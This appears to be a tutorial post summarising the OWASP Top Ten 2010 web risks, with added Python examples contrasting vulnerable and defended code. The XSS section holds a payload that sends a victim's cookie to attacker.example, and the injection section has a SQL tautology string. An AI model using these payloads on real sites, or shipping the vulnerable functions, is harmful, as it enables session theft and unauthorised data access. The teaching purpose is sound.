Web applications are exposed to many kinds of risk. This post summarizes the Top Ten risks for 2010 identified by the Open Web Application Security Project (OWASP).
1. Injection
Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or accessing data the attacker is not authorized to see.
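A worked SQL injection example, added here (it is not part of the original post and not OWASP's code). It builds a small in-memory SQLite table with constructed sample rows, then runs the same lookup twice: once with the user input concatenated into the query text, once with it bound as a parameter. The table, user names and payload are invented for the demonstration.

```python
import sqlite3

# Constructed sample data for this example, not from any real application.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users (username, role) VALUES (?, ?)",
        [("alice", "user"), ("bob", "user"), ("admin", "admin")],
    )
    conn.commit()
    return conn

def lookup_vulnerable(conn, username):
    # Untrusted input is concatenated into the query text, so the SQL parser
    # cannot tell data from command: a quote in `username` rewrites the WHERE clause.
    sql = "SELECT username FROM users WHERE username = '" + username + "'"
    return [row[0] for row in conn.execute(sql)]

def lookup_safe(conn, username):
    # Parameterized query: the value is bound separately from the statement and is
    # never parsed as SQL, whatever characters it contains.
    sql = "SELECT username FROM users WHERE username = ?"
    return [row[0] for row in conn.execute(sql, (username,))]

# Classic tautology payload: turns "username = 'x'" into "username = 'x' OR '1'='1'"
PAYLOAD = "x' OR '1'='1"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", lookup_vulnerable(db, PAYLOAD))  # every row comes back
    print("safe:      ", lookup_safe(db, PAYLOAD))        # nothing matches the literal string
```

The payload makes the concatenated query return all three rows, including the admin account, while the parameterized version returns nothing because no user is literally named `x' OR '1'='1`. The same separation of code and data is the fix for OS and LDAP injection: use an API that takes the argument out of band, or escape for the specific interpreter when no such API exists.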
2. Cross-Site Scripting (XSS)
Cross-site scripting (XSS) is a vulnerability, typically found in web applications, that lets an attacker inject client-side script into web pages viewed by other users. It occurs when an application sends untrusted data to the browser without proper validation and output escaping. Because the injected script runs in the context of the site that served the page, an exploited XSS vulnerability lets the attacker bypass access controls such as the same-origin policy and, for example, read the victim's session cookie or act on the victim's behalf.
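An added example of the defence, not code from the original post: rendering an untrusted comment with and without contextual output encoding, plus the extra check a URL attribute needs. The comment rendering functions, the payload and the host name `attacker.example` are constructed for the demonstration.

```python
from html import escape
from urllib.parse import urlparse

def render_comment_vulnerable(author, body):
    # Untrusted text dropped straight into the page: any tags in `body` become live markup.
    return f"<p><b>{author}</b>: {body}</p>"

def render_comment_safe(author, body):
    # Output encoding for an HTML text context: &, <, >, " and ' become entities,
    # so the browser displays them instead of parsing them.
    return f"<p><b>{escape(author, quote=True)}</b>: {escape(body, quote=True)}</p>"

def render_link_safe(href, text):
    # URL attribute context needs more than entity encoding: a javascript: URL is
    # harmless as text but executes when the link is clicked, so allow-list the scheme.
    scheme = urlparse(href.strip()).scheme.lower()
    if scheme not in ("http", "https"):
        href = "#"
    return f'<a href="{escape(href, quote=True)}">{escape(text, quote=True)}</a>'

# Constructed stored-XSS payload: sends the viewer's cookie to a hostile host.
PAYLOAD = "<script>document.location='http://attacker.example/?c='+document.cookie</script>"

if __name__ == "__main__":
    print(render_comment_vulnerable("eve", PAYLOAD))
    print(render_comment_safe("eve", PAYLOAD))
    print(render_link_safe("javascript:alert(document.cookie)", "click me"))
```

The point of the third function is that encoding is context-specific: `html.escape` is right for text nodes and quoted attributes, but a `javascript:` URL survives it intact, so URL-valued attributes also need a scheme allow-list. In a real application this encoding belongs in the templating layer so it is applied by default rather than remembered per call site.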
3. Broken Authentication and Session Management
Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users' identities.
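An added example (not from the original post) of the session-handling controls this item is about: unguessable tokens, rotation on login, idle expiry, server-side logout, and cookie flags. The `SessionStore` class, the 15-minute timeout and the `SESSIONID` cookie name are assumptions made for the demonstration; the clock is injectable so expiry can be exercised without waiting.

```python
import hashlib
import secrets
import time

SESSION_TTL = 15 * 60  # idle timeout in seconds (assumed policy for this example)

def _key(token):
    # Store only a hash of the token: a leaked session table then does not yield usable tokens.
    return hashlib.sha256(token.encode()).hexdigest()

class SessionStore:
    def __init__(self, now=time.time):
        self._sessions = {}  # token hash -> {"user": ..., "last_seen": ...}
        self._now = now      # injectable clock so expiry can be exercised without waiting

    def create(self, user):
        # 256 bits from the OS CSPRNG. Never build tokens from user ids, timestamps or counters.
        token = secrets.token_urlsafe(32)
        self._sessions[_key(token)] = {"user": user, "last_seen": self._now()}
        return token

    def login(self, presented_token, user):
        # Rotate the identifier when privilege changes, so a token an attacker fixed or
        # captured before authentication does not become an authenticated session.
        self._sessions.pop(_key(presented_token), None)
        return self.create(user)

    def lookup(self, token):
        entry = self._sessions.get(_key(token))
        if entry is None:
            return None
        if self._now() - entry["last_seen"] > SESSION_TTL:
            del self._sessions[_key(token)]  # expire server-side, not only in the cookie
            return None
        entry["last_seen"] = self._now()
        return entry["user"]

    def logout(self, token):
        # Logout must invalidate on the server; deleting the cookie alone leaves the token live.
        self._sessions.pop(_key(token), None)

def session_cookie_header(token):
    # Secure: only sent over TLS. HttpOnly: not readable by page script, so XSS cannot
    # simply read it. SameSite=Lax: withheld from cross-site POSTs (helps against CSRF).
    return f"Set-Cookie: SESSIONID={token}; Path=/; Secure; HttpOnly; SameSite=Lax"
```

The session identifier should also never appear in a URL: it ends up in browser history, proxy logs and the Referer header of any outbound link, which is how many session hijacks start.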
4. Insecure Direct Object References
A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter. Unless an access control check is in place, an attacker can manipulate such a reference to access other objects without authorization.
5. Cross-Site Request Forgery (CSRF)
Cross-Site Request Forgery (also known as XSRF or Cross-Site Reference Forgery) exploits the trust a site places in the user's browser. Site actions are usually tied to specific URLs, e.g. http://www.banksite.com/transfer.php?amount=100&account=12345, so that requesting the URL performs the action. Because the browser automatically attaches the victim's session cookie to any request for that site, an attacker can embed the URL in a page or e-mail (for instance as an image tag) and have the victim's browser perform the action while the victim is logged in.
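An added example of the standard defence, not code from the original post: a per-session anti-CSRF token that the legitimate form carries but a forged cross-site request cannot, applied to a transfer handler shaped like the `transfer.php` example above. The request dictionary, `SERVER_KEY` and the handler's return values are constructed for the demonstration.

```python
import hashlib
import hmac
import secrets

# Per-deployment secret; loaded from configuration in a real app (generated here so the example runs).
SERVER_KEY = secrets.token_bytes(32)

def make_csrf_token(session_id):
    # Token bound to the session via HMAC: a token minted in the attacker's own session
    # does not verify for the victim's, and the secret never leaves the server.
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()

def verify_csrf(session_id, submitted):
    if not submitted:
        return False
    return hmac.compare_digest(make_csrf_token(session_id), submitted)

def handle_transfer(request, session_id):
    """request is a constructed dict: {"method": ..., "form": {...}}.
    Returns (status, message) the way a tiny handler might."""
    if request["method"] != "POST":
        # A state change reachable by GET is exactly what the transfer.php URL above
        # allows: an <img src=...> on any page fires it with the victim's cookies.
        return 405, "state changes require POST"
    if not verify_csrf(session_id, request["form"].get("csrf_token")):
        # Cookies are sent automatically by the browser; the token is not, so a forged
        # cross-site form cannot supply it.
        return 403, "CSRF token missing or invalid"
    amount = int(request["form"]["amount"])
    account = request["form"]["account"]
    return 200, f"transferred {amount} to {account}"

def transfer_form_html(session_id):
    # The token is embedded in the legitimate form as a hidden field.
    return (
        '<form method="POST" action="/transfer.php">'
        f'<input type="hidden" name="csrf_token" value="{make_csrf_token(session_id)}">'
        '<input name="amount"><input name="account"><button>Transfer</button></form>'
    )
```

Moving the action to POST alone is not a fix, since an attacker can auto-submit a hidden form; the token is what stops the forged request. The token also only helps while the site has no XSS, because script running on the origin can read the form and copy it.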
6. Security Misconfiguration
Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, and platform. All of these settings should be defined, implemented, and maintained, since many components do not ship with secure defaults. This includes keeping all software up to date, including the code libraries used by the application.
7. Insecure Cryptographic Storage
Protecting sensitive data with cryptography has become a key part of most web applications. Simply failing to encrypt sensitive data is very widespread. Applications that do encrypt frequently contain poorly designed cryptography, either using inappropriate algorithms (for example unsalted fast hashes for passwords) or making serious mistakes with strong ones, such as hard-coded or poorly protected keys. These flaws can lead to disclosure of sensitive data and compliance violations.
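An added example for the most common instance of this item, password storage; it is not code from the original post. It contrasts an unsalted MD5 with a salted, iterated key derivation (PBKDF2-HMAC-SHA256 from the standard library) stored in a self-describing record. The record format, the 600,000 iteration work factor and the function names are assumptions for the demonstration.

```python
import base64
import hashlib
import hmac
import os

def store_password_weak(password):
    # Unsalted, fast hash: equal passwords give equal hashes, and precomputed tables
    # (or a GPU computing billions of MD5s per second) recover them cheaply.
    return hashlib.md5(password.encode()).hexdigest()

PBKDF2_ITERATIONS = 600_000  # assumed work factor; tune to your hardware and raise over time

def store_password(password, iterations=PBKDF2_ITERATIONS):
    # Random per-user salt plus a slow, iterated KDF (PBKDF2-HMAC-SHA256, in the stdlib).
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    # Self-describing record: algorithm and work factor travel with the hash so the
    # parameters can be raised later without breaking existing entries.
    return "pbkdf2_sha256$%d$%s$%s" % (
        iterations,
        base64.b64encode(salt).decode(),
        base64.b64encode(dk).decode(),
    )

def verify_password(password, record):
    alg, iterations, salt_b64, dk_b64 = record.split("$")
    if alg != "pbkdf2_sha256":
        raise ValueError("unsupported hash record")
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(dk_b64)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, int(iterations))
    # Constant-time comparison so verification timing does not leak matching prefixes.
    return hmac.compare_digest(dk, expected)

def needs_rehash(record, minimum_iterations=PBKDF2_ITERATIONS):
    # Check at login time whether a stored record was made with a now-too-low work factor,
    # and re-store the password while the plaintext is briefly available.
    _, iterations, _, _ = record.split("$")
    return int(iterations) < minimum_iterations
```

Two records for the same password differ because each gets its own salt, so an attacker cannot precompute a table or crack all users of a common password at once. For data that must be recoverable rather than verified (card numbers, for instance), use an authenticated cipher such as AES-GCM with a key kept outside the database, which is a separate design from the one-way hashing shown here.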
8. Failure to Restrict URL Access
Frequently, the only protection for a URL is that links to that page are not shown to unauthorized users. However, a motivated, skilled, or simply lucky attacker may find and access these pages, invoke functions, and view data. Security by obscurity is not sufficient to protect sensitive functions and data. Access control checks must be performed in code before a request to a sensitive function is granted, to ensure the user is authorized to use that function.
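One added example covering both item 4 (Insecure Direct Object References) and item 8 (Failure to Restrict URL Access), since both come down to an authorization check the code never made; it is not code from the original post. It shows an object-level check on a record looked up by an id from the URL, a function-level check on an admin-only handler, and the per-user indirect reference map the 2010 list suggests as an alternative. The users, invoices and role names are constructed sample data.

```python
from functools import wraps

class Forbidden(Exception):
    pass

# Constructed sample data: users with roles, and invoices each owned by one user.
USERS = {
    "alice": {"user"},
    "bob": {"user"},
    "carol": {"user", "admin"},
}
INVOICES = {
    101: {"owner": "alice", "total": 250},
    102: {"owner": "bob", "total": 80},
}

def get_invoice_vulnerable(current_user, invoice_id):
    # Insecure direct object reference: the id from the URL is used as the lookup key
    # with no check that it belongs to the caller. bob can read ?invoice=101.
    return INVOICES[invoice_id]

def get_invoice_safe(current_user, invoice_id):
    # Object-level authorization: the record must be the caller's (or the caller an admin).
    inv = INVOICES.get(invoice_id)
    if inv is None or (inv["owner"] != current_user and "admin" not in USERS.get(current_user, set())):
        # Same error for "does not exist" and "not yours", so ids cannot be enumerated.
        raise Forbidden("no such invoice")
    return inv

def requires_role(role):
    # Function-level authorization enforced in code, not by hiding the menu link.
    def decorator(fn):
        @wraps(fn)
        def wrapper(current_user, *args, **kwargs):
            if role not in USERS.get(current_user, set()):
                raise Forbidden(f"{role} role required")
            return fn(current_user, *args, **kwargs)
        return wrapper
    return decorator

@requires_role("admin")
def admin_list_users(current_user):
    return sorted(USERS)

def indirect_references(current_user):
    # Alternative the 2010 list recommends: per-user indirect references. The page
    # exposes a small index into the user's own list; the database key never leaves the server.
    owned = sorted(i for i, inv in INVOICES.items() if inv["owner"] == current_user)
    return {str(n): i for n, i in enumerate(owned, start=1)}

def is_forbidden(fn, *args):
    # Small helper so callers (and tests) can check a denial without try/except noise.
    try:
        fn(*args)
        return False
    except Forbidden:
        return True
```

The decorator form matters because it makes the check impossible to forget at one call site: every handler that changes state or exposes data declares the role it needs, and a request for a URL that was merely unlinked is refused by the same code path as any other.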
9. Insufficient Transport Layer Protection
Insufficient transport layer protection exposes communication to untrusted third parties, giving them a way to compromise a web application and/or steal sensitive information. Websites typically use Secure Sockets Layer / Transport Layer Security (SSL/TLS) to provide encryption at the transport layer, but often fail to use it for every authenticated page, accept weak protocol versions or cipher suites, or use expired or misconfigured certificates that users learn to click through.
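An added example, not from the original post, showing the client-side half of this item with Python's standard `ssl` module: the verification-disabling shortcut that turns TLS into encryption to whoever is in the middle, beside a context that verifies the chain and hostname and refuses old protocol versions. The `context_is_sound` check and the HSTS helper are assumptions for the demonstration; no network connection is made.

```python
import ssl

def insecure_client_context():
    # The "make the certificate warning go away" shortcut: no chain or hostname
    # verification, so any interposed certificate is accepted and the channel is
    # encrypted to whoever is in the middle.
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False     # must be cleared before verify_mode can be CERT_NONE
    ctx.verify_mode = ssl.CERT_NONE
    return ctx

def hardened_client_context():
    # Loads the platform CA store, requires a valid chain and a matching hostname.
    ctx = ssl.create_default_context()
    # Refuse SSLv3, TLS 1.0 and TLS 1.1; all three are deprecated.
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx

def context_is_sound(ctx):
    # What a deployment check should look for before trusting an outbound connection.
    return (
        ctx.verify_mode == ssl.CERT_REQUIRED
        and ctx.check_hostname
        and ctx.minimum_version >= ssl.TLSVersion.TLSv1_2
    )

def hsts_header(max_age=31536000):
    # Server side: once seen, the browser refuses plain HTTP to this host for max_age
    # seconds, closing the gap where the login page is HTTPS but the first visit was HTTP.
    return f"Strict-Transport-Security: max-age={max_age}; includeSubDomains"
```

The insecure context is the one that shows up in code bases as a workaround for a self-signed test certificate and then ships. If a private CA is genuinely needed, load it with `ctx.load_verify_locations(...)` on the hardened context rather than disabling verification.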
10. Unvalidated Redirects and Forwards
Web applications frequently redirect and forward users to other pages and websites, and use untrusted data to determine the destination. Without proper validation, attackers can redirect victims to phishing or malware sites, or use forwards to reach unauthorized pages.
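An added example of validating a redirect target, not code from the original post. It accepts a bare path or an HTTPS URL on an allow-listed host and falls back to a default for everything else, including the protocol-relative, backslash and userinfo forms that naive prefix checks miss; server-side forwards are handled by mapping a name to a page instead of accepting a path. The host `www.example.com`, the forward table and the `.jsp` paths are assumptions for the demonstration.

```python
from urllib.parse import urlparse

ALLOWED_HOSTS = {"www.example.com"}  # assumption: the application's own host names

def safe_redirect_target(next_param, default="/"):
    """Return a redirect target that stays on this site, or `default` if `next_param` is unsafe."""
    if not next_param:
        return default
    candidate = next_param.strip()
    parsed = urlparse(candidate)
    if parsed.scheme or parsed.netloc:
        # Absolute URL (this branch also catches protocol-relative "//evil.example"):
        # only our own hosts, only over HTTPS. Compare hostname, not netloc, so that
        # "https://www.example.com@evil.example/" resolves to evil.example and is refused.
        if parsed.scheme.lower() != "https" or parsed.hostname not in ALLOWED_HOSTS:
            return default
        return candidate
    # Otherwise require a plain absolute path. "/\\evil.example" is rejected because
    # some browsers treat the backslash as a slash and leave the site.
    if not candidate.startswith("/") or candidate.startswith("/\\"):
        return default
    return candidate

# For server-side forwards, map a short name to an internal page instead of accepting a path,
# so a parameter cannot name a page the user is not allowed to reach.
FORWARD_TABLE = {"dashboard": "/app/dashboard.jsp", "profile": "/app/profile.jsp"}

def safe_forward(page_name, default="/app/dashboard.jsp"):
    return FORWARD_TABLE.get(page_name, default)
```

Prefix checks such as `url.startswith("https://www.example.com")` are the usual broken version of this: they pass `https://www.example.com.evil.example/` and `https://www.example.com@evil.example/`, both of which the hostname comparison above rejects.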